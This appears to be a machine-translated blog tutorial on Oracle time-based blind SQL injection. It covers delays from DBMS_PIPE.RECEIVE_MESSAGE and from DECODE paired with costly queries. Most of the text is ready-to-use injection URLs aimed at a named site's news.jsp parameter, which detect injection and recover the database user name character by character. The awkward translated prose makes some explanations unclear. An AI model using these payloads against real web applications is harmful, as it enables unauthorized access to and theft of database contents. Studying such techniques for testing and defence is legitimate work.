Oracle-based delay blinds summary

Oracle-based delay blinds summary

0x00 Foreword

oracle can be injected via a state of the page response, the response time is referred to herein, is determined in this manner is a manner that the SQL execution time is blind;

 

oracle time blinds usually DBMS_PIPE.RECEIVE_MESSAGE (), while another is to decode () and high consuming SQL operations in combination , of course, also be a case, if other means in combination with a high time-consuming operation, where high time-consuming operation means that, for example: (the SELECT COUNT (*) from all_objects) , large amounts of data in the database query or other processing operations, such operations will consume more time, and then get the data through this way . This approach is also applicable to other databases.

 

---

 

0x01 DBMS_PIPE.RECEIVE_MESSAGE () function delay blinds

DBMS_LOCK.SLEEP () function allows a process to sleep a lot of seconds, but there are many use this function restriction .

First, the function can not be directly injected into the sub-query because Oracle does not support stacked queries (stacked query). Second, only a database administrator can use DBMS_LOCK package.

There is a better way in Oracle PL / SQL, the following command can be used inline injection delay:

dbms_pipe.receive_message('RDS', 10)

DBMS_PIPE.RECEIVE_MESSAGE function will wait 10 seconds RDS data returned from the pipeline. By default, it allows the public authority to execute the package. DBMS_LOCK.SLEEP () In contrast, it can be used in a SQL statement in the function.

Delay application of blinds:

http://www.jsporcle.com/news.jsp?id=-1 or 1= dbms_pipe.receive_message('RDS', 10)--
http://www.jsporcle.com/news.jsp?id=1 and 1=dbms_pipe.receive_message('RDS', 10)--

If the page returned 10 seconds delay, i.e. the presence of injection.

 

DBMS_PIPE.RECEIVE_MESSAGE syntax from the official website:

DBMS_PIPE.RECEIVE_MESSAGE (

   pipename IN VARCHAR2,

   timeout      IN INTEGER      DEFAULT maxwait)

RETURN INTEGER;

Understood to be temporarily DBMS_PIPE.RECEIVE_MESSAGE ( 'arbitrary value ", the delay time)

 

 

 

0x02 decode function delay blinds

decode can not only use the Boolean blinds, you can also use the delay in the blinds.

Join statement decode delay in the injection. Here joined our dbms_pipe.receive_message function.

and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',10),0) from dual) --
 http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',5),0) from dual) --

 

Of course, this does not necessarily delay the operation of the delay function can also be used to spend more time to query the database for all entries. E.g:

(select count(*) from all_objects) 

http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual) and '1'='1'

This obviously can be a time difference determination result of the injection of expression.

 

posted @ 2019-05-30 20:57 Mr. Ching reading (...) Comments (...) edit collections